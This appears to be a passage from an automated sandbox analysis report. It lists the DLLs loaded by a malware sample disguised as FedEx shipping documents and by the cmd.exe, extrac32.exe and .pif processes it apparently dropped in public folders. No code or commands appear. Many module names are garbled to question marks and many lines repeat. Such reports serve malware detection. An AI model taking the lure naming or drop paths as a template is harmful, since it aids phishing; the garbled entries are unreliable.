        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: smartscreenps.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: smartscreenps.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: ??????????.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: ??.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: ??.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: ??.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: ??????????.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: ??????????.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: ??????????.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: ??.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: ??.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: ??.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: ???.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: ???.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: ???.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: ??l.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: ??l.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: ?.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: ?.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: ??l.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: ????.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: ???e???????????.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: ???e???????????.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: ?.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: ?.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: ?.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: ?.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: ??l.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: ??l.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: tquery.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: cryptdll.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: spp.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: vssapi.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: vsstrace.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: spp.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: vssapi.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: vsstrace.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: mssip32.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: endpointdlp.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: endpointdlp.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: endpointdlp.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: endpointdlp.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: advapi.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: advapi.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: advapi.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: advapi.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: advapi.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: advapi.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: advapi.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: spp.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: vssapi.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: vsstrace.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: sppwmi.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: sppcext.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: winscard.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: devobj.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: wldp.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: amsi.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: userenv.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: profapi.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: version.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: rasapi32.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: rasman.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: rtutils.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: secur32.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: schannel.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: edputil.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: dwrite.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: windowscodecs.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\Public\ndpha.pifSection loaded: zipfldr.dllJump to behavior
        Source: C:\Users\Public\ndpha.pifSection loaded: propsys.dllJump to behavior
        Source: C:\Users\Public\ndpha.pifSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\Public\ndpha.pifSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\Public\ndpha.pifSection loaded: wldp.dllJump to behavior
        Source: C:\Users\Public\ndpha.pifSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: version.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: url.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: ieframe.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: netapi32.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: userenv.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: netutils.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: wldp.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: propsys.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: amsi.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: winmm.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: am.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: wininet.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: profapi.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: ieproxy.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: ieproxy.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: ieproxy.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFSection loaded: msasn1.dllJump to behavior
